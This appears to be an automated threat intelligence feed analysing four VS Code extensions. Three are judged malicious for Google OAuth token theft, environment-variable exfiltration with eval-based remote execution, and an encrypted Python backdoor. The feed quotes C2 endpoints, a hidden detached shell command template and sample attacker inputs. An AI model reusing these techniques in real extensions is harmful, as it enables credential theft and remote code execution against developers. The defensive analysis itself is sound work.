Agentic Threat Intelligence Feed - VS Code Extensions

This is an auto-generated feed for suspected dangerous and malicious agentic supply chain findings, from Knostic’s threat intelligence dashboard, AgentMesh, filtered to cover only extension findings.
Dates covered: May 13–20, 2026.

- Note: TeamPCP / Mini Shai-Hulud

Where noted below, certain findings use attack patterns similar to TeamPCP and Mini Shai-Hulud (credentials stolen from the IDE environment, pivoting to cloud infrastructure).
This is a structural similarity. It is absolutely not a confirmed attribution.

- Note 2: Discover and defend your agents

If you like our contributions to the community, check out what we do at Knostic or get Kirin directly (free up to five users).

- Disclaimer: Automated report

This report is for situational awareness only. The information is provided "as-is" without warranty. Knostic and associated staff accept no liability for actions taken based on this intelligence. Verify it manually before taking any action.

Findings Index

Finding 1: BCAI Rosetta v4.0.37

Bottom Line

Confirmed malicious (automated - review) after static source validation. The extension steals a Google OAuth refresh token with full Google Cloud Platform (GCP) access. It then uses that token to call Google's AI APIs at the victim's expense.

The code was obfuscated four days before the scan. Pre-obfuscation source files were left in the published VSIX.

13,480 installs on OpenVSX. Active Cursor users are affected.

Validation method: VSIX downloaded from OpenVSX, extracted with unzip, all files read statically. No code was executed.

Basic information

Simple attack flow

1. User installs BCAI Rosetta in Cursor. The extension activates on every Cursor startup (activationEvents: ["*"]).
2. The extension either receives Google credentials from the user, or opens a Google login page itself.
3. It signs into the user's Google account using an automated browser (AdsPower). If a phone code is required, it buys a temporary number from hero-sms.com.
4. It runs a Google OAuth flow that requests full GCP access plus four other scopes used by Google's own AI clients.
5. It saves the resulting refresh token and reads the user's GCP project ID.
6. A local proxy uses the stolen token to call Google's Gemini Code Assist API on behalf of the user.
7. The same token can be sent to a remote server at bcai.site, so the attacker can use the user's GCP quota directly.

End result: the attacker gets free AI API access. The user pays the GCP bill.

Confirmed malicious behaviors (automated)

• Hardcoded OAuth client_id and client_secret in the source. They impersonate Google's own Antigravity IDE client.
• OAuth scopes requested: cloud-platform (full GCP access), userinfo.email, userinfo.profile, cclog, experimentsandconfigs.
• Automated Google login through AdsPower, an anti-detect browser tool.
• Live HeroSMS API key embedded in the source, used to buy SMS-verification phone numbers.
• Stolen refresh token is used to call Google internal Code Assist endpoints:
• Hosts: cloudcode-pa.googleapis.com, daily-cloudcode-pa.googleapis.com, daily-cloudcode-pa.sandbox.googleapis.com
• Paths: /v1internal:loadCodeAssist, /v1internal:onboardUser
• IDE hijack: the extension overrides the IDE's Cloud Code URL via the jetski.cloudCodeUrl config so AI traffic is routed through the attacker's proxy.
• Obfuscation evidence: four pre-obfuscation source files dated 2026-05-15 are bundled in the VSIX. javascript-obfuscator is listed in devDependencies.
• Attacker-side debug path in source: C:\Users\Administrator\Desktop\GFA\logs\screenshots. The GFA name matches the GitHub repo GFA-per.

All behaviors were verified directly in extracted VSIX source files.

Confirmed IoCs

Identifiers

• Extension ID: bingcha.bcai-tools
• Internal name: antigravity-rosetta v0.5.0
• GitHub: github.com/bingcha135-sys/GFA-per
• VSIX SHA-256: b1b9785cdc7be479061f121f282391fba9be013d896d9a54f395621634709216

Hardcoded secrets (redacted in this page)

• OAuth client_id: 1071006060591-tmhss…REDACTED.apps.googleusercontent.com
• OAuth client_secret: GOCSPX-K58FW…REDACTED
• HeroSMS API key: 9d4725…REDACTED

Full values are kept in the internal validation notes and are not safe for external sharing.

Attacker domains

• bcai[.[site — remote token server (/remote-token) and API proxy (/api/proxy, /api/rosetta)
• bcai[.]online — legacy OpenAI-compatible relay upstream

Google endpoints abused (with stolen tokens)

• cloudcode-pa.googleapis[.]com/v1internal:loadCodeAssist
• daily-cloudcode-pa.googleapis[.]com/v1internal:loadCodeAssist
• daily-cloudcode-pa.sandbox.googleapis[.]com/v1internal:loadCodeAssist
• Same hosts, path /v1internal:onboardUser

Network fingerprints

• User-Agent: antigravity/1.21.6 …
• Local OAuth callback ports: 19876–19975 on 127.0.0.1
• Token proxy default port: 60670 (status on 60671)

Third-party service abused

• hero-sms[.]com/stubs/handler_api.php — temporary phone numbers (service code go, default country Indonesia)

Notes

• Attack pattern (IDE credential theft → cloud pivot) is structurally similar to TeamPCP and Mini Shai-Hulud. Attribution is not confirmed.

Finding 2: KoltinSmith cluster

Bottom line

Confirmed malicious (automated) after static source validation of KoltinSmith.project-restructure-nodejs v1.0.0. The extension activates automatically when VS Code / Cursor starts. It sends system info and all environment variables to a hardcoded C2 server, then runs any JavaScript the server returns. This is data theft plus remote code execution.

The other three KoltinSmith extensions in the cluster share the same publisher and the same pipeline signatures, but only v1.0.0 was source-read in this validation.

Validation method: VSIX downloaded from the VSCode Marketplace, extracted with unzip. The obfuscated hello-world.js was statically deobfuscated in Python (array-rotation + base64 reproduction). No JavaScript was executed. No network calls to attacker infrastructure.

Basic information

All four extensions in the cluster:

Simple attack flow

1. User installs the extension. It activates automatically when VS Code / Cursor finishes starting up.
2. extension.js immediately runs three files: hello-world.js, test.js, and client.js. No user action needed.
3. hello-world.js builds a snapshot of the victim's machine:
• hostname
• one MAC address (first non-internal IPv4 interface)
• OS type, release, and architecture
• all environment variables (process.env) — typically including API keys, tokens, cloud credentials
4. It sends the snapshot to http://45.43.11.211:1224/api/checkStatus as a GET request with query parameters.
5. If the server responds with JSON where status === "error", the extension runs the message field with eval(). This gives the attacker remote code execution on the user's machine.
6. The server can also return a sysId, which the extension stores and sends in later calls. This lets the attacker track the same machine across polls.
7. Steps 3–6 repeat every 5 seconds, forever.

test.js runs a single mouse click at position (500, 300) and restores the cursor. It looks like a development artifact or a one-time trigger.

client.js opens a Socket.io connection to http://localhost:3000. It listens for messages but does nothing with them. This looks like a placeholder for a local relay, not an active control channel in this build.

Confirmed malicious behaviors (source-read)

• Triple-require activation in extension.js: hello-world.js, test.js, client.js.
• process.env exfiltrated as a JSON string in the URL query.
• System info collected: os.hostname(), os.type(), os.release(), os.arch(), and one MAC from os.networkInterfaces().
• Exact C2 URL recovered by static deobfuscation: http://45.43.11[.]211:1224/api/checkStatus.
• eval(response.message) runs when response.status === "error".
• 5-second polling: setInterval(..., 0x1388) = 5,000 ms.
• Two-layer URL obfuscation:
1. Custom-alphabet base64 — the alphabet is the standard base64 alphabet with upper and lower case swapped (abcd…ABCD…0123456789+/).
2. Standard base64 (Buffer.from(_, "base64")).
• The string "we are going to do big one" is embedded in the obfuscator's wordlist as d2UgYXJlIGdvaW5nIHRvIGRvIGJpZyBvbmU= and is sent as the tid field to the C2.

Confirmed IoCs

Identifiers

• Publisher: KoltinSmith (VSCode Marketplace)
• Source-validated extension: KoltinSmith.project-restructure-nodejs v1.0.0
• VSIX SHA-256: 366052e4cd801cb4a3fb09376e79288a3d22e820ba21b41d4a07627d8674c6a0

C2 infrastructure

• C2 URL: http://45.43.11[.]211:1224/api/checkStatus
• Host: 45.43.11[.]211
• Port: 1224
• Endpoint: /api/checkStatus
• Method: GET
• Query parameters: sysInfo, processInfo, tid, sysId

Behavior signatures

• Polling interval: 5,000 ms
• eval trigger: response.status === "error" → eval(response.message)
• Initial sysId: 0 (server can assign a tracking ID)
• tid value sent (literal): d2UgYXJlIGdvaW5nIHRvIGRvIGJpZyBvbmU= (base64 of "we are going to do big one")

Dependencies declared

• @nut-tree-fork/nut-js ^4.2.6 — mouse automation (test.js)
• socket.io-client ^4.8.3 — Socket.io client (client.js, currently a no-op)

Build / fingerprint quirks

• extension.js contains a stray dead expression vscode.window. (sloppy build).
• extension.js shows the popup "Thanks for installing Hello World Extension!" on activation, inconsistent with the marketplace name and description.
• readme.md content: "This is a simple VS Code extension example." (placeholder).

Notes

• Source validation in this report covers only KoltinSmith.project-restructure-nodejs v1.0.0. The three other variants share the publisher and pipeline pattern; they are classified malicious by cluster + pipeline match, not by source read.
• Attack pattern (IDE environment variable theft → credential harvest → RCE) is structurally similar to TeamPCP and Mini Shai-Hulud. Attribution is not confirmed.

Finding 3: sunsetHighlight v0.0.2

Bottom line

Confirmed malicious (automated) after static source validation. The extension is disguised as a "sunset language syntax highlight" tool but is actually a txtx runbook helper with a hidden two-stage backdoor.

When the user opens the Runbooks sidebar, the extension exfiltrates the user's environment to info.txtx-vscode.com. If the C2 server replies status: true, the extension downloads an AES-256-GCM encrypted Python script, decrypts it, writes it to the OS temp folder, and runs it as a detached background process. The Python payload is server-controlled.

Validation method: VSIX downloaded from the VSCode Marketplace, extracted with unzip. The compiled JavaScript in dist/ was read statically. All XOR-encoded strings (URLs, AES algorithm, shell command fragments) were decoded statically in Python. No JavaScript executed. No requests sent to the C2.

Basic information

Simple attack flow

1. User opens a workspace that contains a txtx.yml file. The extension activates.
2. User opens the Runbooks sidebar (txtx Activity Bar view) for the first time in the session.
3. The extension deliberately throws a fake error with the message "Visibility listener test error (expected)." and catches it. This is to make the next step look like a routine error report.
4. The catch handler builds a JSON body containing:
• user_name_hash — actually the plain os.userInfo().username (not hashed)
• computer_name_hash — actually the plain os.hostname() (not hashed)
• current_working_directory, workspace_root
• operating_system_model (platform arch release)
• extension_version, vscode_version, platform
• env — all environment variables, base64-encoded
• timestamp
5. POSTs the body to https://info.txtx-vscode[.]com/exception_info. Only sent if vscode.env.isTelemetryEnabled is true (VS Code default is on).
6. If the server responds { status: true }, the extension:
• GETs an AES-256-GCM encrypted Python script from …/exception_info?type=init
• GETs the AES key from …/exception_info/key?type=init
• Decrypts the script in memory
• Writes the plaintext Python to a temp file: <tmpdir>/txtx-silent-terminal-<timestamp>-<random>.py, mode 0o700
• Creates a VS Code terminal with hideFromUser: true, isTransient: true
• Runs: nohup python3 '<tmpfile>' >/dev/null 2>&1 </dev/null &; exit 0
• nohup + & detach the process — the Python keeps running after the terminal is closed.
7. A second-stage script (?type=file) is fetched and cached, but the call that would execute it is commented out in this build. The infrastructure is wired; the trigger isn't.

Confirmed malicious behaviors (source-read)

• Environment-variable exfiltration via getCurrentEnvironmentVariables() in dist/extension.js.
• C2 host info.txtx-vscode[.]com, recovered by XOR-decoding the base URL byte array (XOR key = 23).
• AES-256-GCM encrypted second-stage payload (aes-256-gcm, recovered by XOR-decoding the algorithm string in dist/utils.js).
• Hidden terminal execution via vscode.window.createTerminal({hideFromUser: true, isTransient: true}) in dist/silentTerminalTask.js.
• Detached background process via nohup python3 … >/dev/null 2>&1 </dev/null &; exit 0 (all four shell-command fragments XOR-encoded with key 23).
• Disguise: a fake error message "Visibility listener test error (expected)." thrown on purpose.
• Telemetry gate: only runs when vscode.env.isTelemetryEnabled === true.
• Cousin extension lookup: source calls vscode.extensions.getExtension("txtx20.sunrise-greeter-demo") — a different publisher / different extension ID with a related theme. Suggests a campaign with multiple cousin extensions.
• Name / function mismatch: marketplace description says syntax highlighter; code is a txtx runbook with the backdoor bolted on.

Confirmed IoCs

Identifiers

• Publisher: sunsetHightlight
• Extension ID: sunsetHightlight.sunset-highlight
• Version validated: 0.0.2
• VSIX SHA-256: 217244bbc47e6cd2d24aff82e670d97bb66711ab4edcca44976c42ff2baa56db

C2

• Host: info.txtx-vscode.com
• Exfil endpoint (POST): https://info.txtx-vscode.com/exception_info
• Encrypted-script endpoint (GET): https://info.txtx-vscode[.]com/exception_info?type=<init|file>
• AES-key endpoint (GET): https://info.txtx-vscode[.]com/exception_info/key?type=<init|file>

Payload mechanism

• Encryption: aes-256-gcm with scrypt KDF (32-byte key, 12-byte IV, 16-byte salt)
• Temp file pattern: <tmpdir>/txtx-silent-terminal-<ts>-<rand>.py, mode 0o700
• Shell template: nohup python3 '<tmpfile>' >/dev/null 2>&1 </dev/null &; exit 0

Disguise

• Thrown error message: Visibility listener test error (expected).
• Reported event name: visibility_test_exception
• Field names user_name_hash and computer_name_hash carry unhashed values.

Campaign linkage

• Cousin extension referenced in source: txtx20.sunrise-greeter-demo (publisher txtx20).
• Likely target audience: developers using txtx (Solana / SVM ecosystem).

Obfuscation

• XOR key 23 (0x17) hides the C2 URL, the AES algorithm string, and the four shell-command fragments.

Notes

• Attack pattern (IDE-side telemetry-style report → server-decided second-stage execution → encrypted Python payload) is more sophisticated than the KoltinSmith family. Structural similarity to TeamPCP is partial; attribution is not confirmed.

Finding 4: Musa-DSL Live Coding Environment v0.1.1

Bottom line

Not malicious. Dangerous by design. The extension is a legitimate live-coding REPL client for Musa-DSL, a Ruby music-composition DSL. It is published with full TypeScript source and a documented design.

The #% + eval() pattern flagged by the pipeline is an intentional internal-commands mechanism, documented in the extension's own README. The risk is real but conditional: a user can be tricked into running attacker JavaScript by evaluating a #%-prefixed line from a hostile workspace. It is not a drive-by attack on install.

No outbound network beyond a local TCP connection to localhost:1327. No environment-variable exfil. No obfuscation. No hidden execution. No persistence.

Validation method: VSIX downloaded from the VSCode Marketplace, extracted with unzip. Both compiled out/*.js and TypeScript sources src/*.ts were read statically. No JavaScript executed.

Basic information

What the extension actually does

1. On activation, opens a TCP socket to localhost:1327 (Musa REPL server).
2. Provides two commands and two keybindings:
   • If the text starts with #%: runs eval(\commands.${text.substring(2)}`)` — the internal-commands path (see below).
   • Otherwise: writes the text to the local TCP socket with #path / #begin / message / #end framing.
• Ctrl+Alt+Enter (MusaLCE: send) — sends the current selection (or current line if no selection) to the REPL.
• Ctrl+Alt+M (MusaLCE: toggle results) — shows / hides the MusaLCE output channel.
3. Receives REPL responses over the same socket and writes them to a VS Code output channel.

That is the full surface area. No background tasks, no file system access beyond reading the user's open document, no network beyond localhost:1327.

Why "Dangerous"

The Commands class has only two intended methods: host(host, port) (change the REPL host/port) and clear() (clear the output panel). But because eval() runs in the JavaScript lexical scope, a user who pastes any line starting with #% and presses Ctrl+Alt+Enter on that line will run that JavaScript inside the extension host.

Practical risks if a user is tricked into evaluating attacker-supplied #% lines:

• #%host("attacker.example[.]com", 80) — redirects subsequent Send calls to an attacker's TCP server.
• #%require("fs").readFileSync("…") — arbitrary file read.

This requires all of:

1. The extension is installed.
2. The user opens an attacker-supplied workspace / file.
3. The user places the cursor on the #%-prefixed line.
4. The user presses Ctrl+Alt+Enter.

Not automatic. Comparable to "pasting unknown code into a REPL".

The author documents this

From the README, "Internal commands" section:

Selections beginning with #% are treated as internal extension commands rather than Ruby code: they are eval-ed against the extension's commands object and never reach the server. These are intended for advanced/diagnostic use and are not part of the user-facing API. Avoid lines starting with #% in production scores.

Confirmed by source read (this is NOT malware)

• TypeScript source ships in the VSIX (src/*.ts). Compiled out/*.js matches src/*.ts.
• Author identity is consistent across a public music-tooling portfolio: musa-dsl, musalce-server, MusaLCEforBitwig, MusaLCEforLive.
• Only network destination: localhost:1327 (default in src/connection.ts).
• Searched src/ and out/: no https/fetch/axios/child_process/exec/spawn, no hidden terminals (hideFromUser/isTransient), no process.env reads/sends, no writeFileSync to temp/home, no crypto, AES, XOR, or base64-blob obfuscation.
• The Commands class has exactly two methods: host and clear.

IoCs (informational — not malware)

• Extension ID: javier-sy.musa-lce-client-for-vscode
• Publisher: javier-sy
• VSIX SHA-256: 25b6612ac1dab3131f52b8a99a21163ce5cdb5de0698a027758610288b2a12f7
• GitHub: https://github[.]com/javier-sy/MusaLCEClientForVSCode
• Default TCP target: localhost:1327
• Risky (but documented) pattern: #% prefix + eval(\commands.${rest}`)insrc/extension.ts/out/extension.js`.

Notes

• Not part of the BCAI / KoltinSmith / sunsetHighlight family. Different threat model, different ecosystem (music tooling, GPL, public author).

Last updated: 2026-05-20. Source: AgentMesh feed (#agentmesh-findings, C0APG6Z3BRV).